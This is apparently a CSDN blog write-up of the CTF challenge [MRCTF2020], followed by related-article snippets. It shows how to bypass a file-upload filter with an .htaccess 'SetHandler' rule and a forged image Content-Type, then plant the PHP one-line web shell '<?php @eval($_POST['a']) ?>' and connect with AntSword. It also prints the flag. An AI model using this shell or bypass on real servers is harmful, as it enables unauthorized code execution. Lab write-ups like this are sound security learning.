[MRCTF2020]你传你马呢

最新推荐文章于 2023-12-04 11:54:45 发布
最新推荐文章于 2023-12-04 11:54:45 发布
阅读量563 收藏 1
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46481239/article/details/108582322
版权

打开发现文件上传
在这里插入图片描述
上传了一个php木马文件,发现上传失败,于是更改为图片马,但我们需要把.jpg图片内容解析为php文件,因此我们需要先上传一个.htaccess文件,.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上传的jpg/png图片以php文件执行。
先上传一个.htaccess文件,文件内容为

SetHandler application/x-httpd-php

(mac系统的.htaccess文件会被隐藏,所以我们可以先随意命名,然后通过抓包将fileame更改为.htaccess 将Content-Type:改成image/jpeg)如果不是mac直接上传.htaccess文件,但也要注意将content-type更改,并看看是否成功上传
在这里插入图片描述
改好后go一下,可以看见文件上传成功,然后我们继续上传图片马
内容:

<?php @eval($_POST['a']) ?>

在这里插入图片描述
上传成功,将路径记下来,看看是否成功
在这里插入图片描述
查看一下phpinfo
在这里插入图片描述
上传成功
蚁剑连接
在这里插入图片描述
拿到flag
flag{2ff15461-bd8e-4646-9dea-70789b3eeab2}

F10NAF11pp3d
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vigenere-cipher:Vigenere密码
03-19
虚拟密码 vigenere密码是一种利用密钥的加密和解密方法。它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
BUUCTF-Web-[MRCTF2020]你
m0_61851859的博客
04-03 389
3.考虑是不是对php进行过滤,尝试黑名单绕过,将文件后缀修改为.phtml等一些后缀名发现上失败。4.将文件类型修改为.jpg类型尝试上并启用burpsuite抓包发现是可以成功上的。一个.htaccess文件去把.jpg解析成.php。把content-type改成image/jpeg。1.打开题目发现文件上位置,猜测为文件上漏洞。7.拼接url使用蚁剑连接,成功找到flag。2.尝试上一句话木,上失败。
[MRCTF2020]你呢 学习笔记
weixin_45869407的博客
10-30 2096
最近做了一下文件上的题目 这里直接看到可以上文件,然后直接上上去 看到直接上成功,但上成功也不能解析成PHP格式的文件,蚁剑连不上。 只能看到了的writerup,所以我们知道有个配置文件可以利用,.htaccess这个文件,这里我就说一下这个怎么用的,具体的看这里,这个文件我是这样写并且上的 这段代码的大概意思就是通过.htaccess文件,通过 标签可以实现对目标文件的寻找,并且进行配置,所以这里的文件名必须为我们上的图片的名字,然后我们修改它的配置为PHP格式的执行方式,上
[MRCTF2020]你你码呢
m0_68074153的博客
08-08 812
.htaccess配置文件修改上图片码
『CTF Web复现』BUUCTF-[MRCTF2020]你
Ho1aAs‘s Blog
09-26 612
# 利用点 - 上htaccess解析png
BUUCTF之你呢 [MRCTF2020]
最新发布
Ran_799的博客
12-04 453
文件上绕过的方法有很多, 试了一下发现能用.htaccess解析漏洞,我们先创建一个文件,文件名为.htaccess,内容为。还是被过滤掉了,接着修改一下MIME信息,判断是不是有MIME过滤,将请求头的Content-Type内容改为。上成功了,确认是黑名单过滤文件后缀跟MIME,还回显了路径,那这就好办了。接着我们切到重复器那边,随便修改一下文件后缀,判断是白名单还是黑名单绕过。然后复制一下回显的地址,并将之前的连接拼起来,得到后面的url。上该文件,抓包修改一下MIME信息。
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点...选择不同的素数对,$l
[MRCTF2020]你呢 -wp
freerats的博客
07-07 3722
一个上框,php和phtml等不能,发现可以jpg,也可以.htaccess文件 思路就比较清晰了,.htaccess文件,然后再一张jpg图片,就会被解析为php .htaccess无法直接上,改Content-Type: image/jpeg就可以上了,成功同时还会出现上路径,省事的很 把我们的图片上去 upload/de7a617af67d04960a345bd95c169b14/222a8.jpg 用这个路径蚁剑连接就可以了 ...
ctf get post 参 HackBar
热门推荐
weixin_44614983的博客
01-31 3万+
get和post是http协议的两种基本请求方式 GET - 从指定的资源请求数据。 POST - 向指定的资源提交要被处理的数据 https://www.w3school.com.cn/tags/html_ref_httpmethods.asp 知乎上这篇更详细,关于get和post的区别 https://www.zhihu.com/question/28586791 web题中会遇到,比如...
ctf赛题上一个php木,从一道CTF题学习PHP反序列化漏洞
weixin_33551941的博客
03-17 851
一、CTF题目前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下:class SoFun{protected $file='index.php';function __destruct(){if(!empty($this->file...
CTFHUB RCE 命令注入最后一题(解)
qq_51250415的博客
05-22 525
CTFhub命令注入最后一题:结题
CTF web题目中怎么用写脚本的方法POST参?——-利用python脚本
日熙的博客
07-14 3829
Python 提供了简单易用、功能强大的 HTTP 第三方开源库 Requests,帮助我们轻松解决关于 HTTP 的大部分问题。 在写python脚本之前必须得先导入requests模块哦,详细教程见:win10 python如何安装requests———超详细教程 下面就用题目Bugku web基础$_POST来做示范: 运行python程序,输入如下命令: import requests r = requests.post(‘http://123.206.87.240:8002/post/’, dat
CTFHub技能树笔记之SSRF:POST请求、文件上
weixin_48799157的博客
04-03 7665
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
ctf赛题上一个php木,文件上的ctf_web题目【伪协议】
weixin_34816913的博客
03-17 994
1.第一题Qiyu_20170807_210121.png文件包含可以读到php源代码源代码:require("header.php");$page="";if (isset($_GET['page']))$page=$_GET['page'].".php"; #page参数自动添加了.php后缀,因此文件包含的index不需要加后缀else$page="main.php";include(...
BUUCTF:二维码
../../../../../../../
04-21 3409
一道简单的misc题 将图片放入Wireshark解析 pk为文件形式,可知里面包含文件,进入binwalk分析提取文件 命令:binwalk -e 文件名

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值